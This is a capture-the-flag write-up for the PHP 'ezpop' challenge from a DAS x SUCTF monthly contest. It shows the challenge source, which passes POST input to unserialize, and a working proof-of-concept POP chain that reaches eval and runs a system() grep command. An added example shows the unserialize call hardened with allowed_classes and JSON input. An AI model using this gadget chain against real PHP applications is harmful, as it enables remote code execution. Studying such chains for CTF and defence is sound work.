DAS x SUCTF March Monthly Contest Writeup + Reproduction

_LEON_ 2022-03-30
php

ezpop

The source code is given directly:

<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}

POP chain:

poc:

<?php

class crow
{
    public $v1;
    public $v2;
    public function __construct($v1,$v2)
    {
        $this->v1 = $v1;
        $this->v2 = $v2;
    }
}

class fin
{
    public $f1;
    public function __construct($f1)
    {
        $this->f1 = $f1;
    }
}

class what
{
    public $a;
    public function __construct($a)
    {
        $this->a = $a;
    }
}
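class mix
{
    // Declared explicitly so the property is not created dynamically
    // (dynamic properties are deprecated since PHP 8.2).
    public $m1;
    public function __construct($m1)
    {
        $this->m1 = $m1;
    }
}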

$a = new fin(new what(new mix(new crow(new fin(new mix(';
system(\'grep -r "{"\');')),''))));
echo urlencode(serialize($a));
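
The root cause in the challenge source is `unserialize($_POST['cmd'])` with every declared class available for instantiation. The following is an added example, not part of the original post, that contrasts that call with `allowed_classes => false` and with JSON input; the trimmed `fin` class, its `$calls` counter and the sample payload are constructed for illustration.

```php
<?php
// Added example (not from the original post). `fin` is a trimmed stand-in for
// the challenge's entry gadget; the counter and the payload are constructed.

class fin
{
    public $f1;
    public static $calls = 0;   // hypothetical counter replacing the echo sink

    public function __destruct()
    {
        // In the challenge this is where `echo $this->f1 . '114514'` runs,
        // i.e. the first link that hands control to the rest of the chain.
        self::$calls++;
    }
}

// Constructed sample input: a serialized `fin` holding a harmless string.
$payload = 'O:3:"fin":1:{s:2:"f1";s:4:"test";}';

// 1) Challenge behaviour: the class is instantiated, so its destructor runs
//    as soon as the object is released.
$obj = unserialize($payload);
unset($obj);
$unrestricted = fin::$calls;

// 2) Hardened call: no classes are allowed. The value is materialised as
//    __PHP_Incomplete_Class, which carries no magic methods, so no gadget
//    (__destruct, __toString, __invoke, __call) can be reached.
$safe = unserialize($payload, ['allowed_classes' => false]);
$isIncomplete = $safe instanceof __PHP_Incomplete_Class;
unset($safe);
$restricted = fin::$calls - $unrestricted;

// 3) Preferred design: do not accept serialized objects from the client.
//    JSON decodes to arrays and scalars only and never instantiates classes.
$data = json_decode('{"cmd":"test"}', true, 16, JSON_THROW_ON_ERROR);

printf("unrestricted unserialize: %d destructor call(s)\n", $unrestricted);
printf("allowed_classes=false: incomplete=%s, destructor call(s)=%d\n",
    var_export($isIncomplete, true), $restricted);
printf("json_decode result type: %s\n", gettype($data));
```

The `allowed_classes` option requires PHP 7.0 or later and `JSON_THROW_ON_ERROR` requires PHP 7.3 or later.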

Note:
I'm too much of a noob, so I only solved pop during the contest; I'll post the other challenges once I've reproduced them.
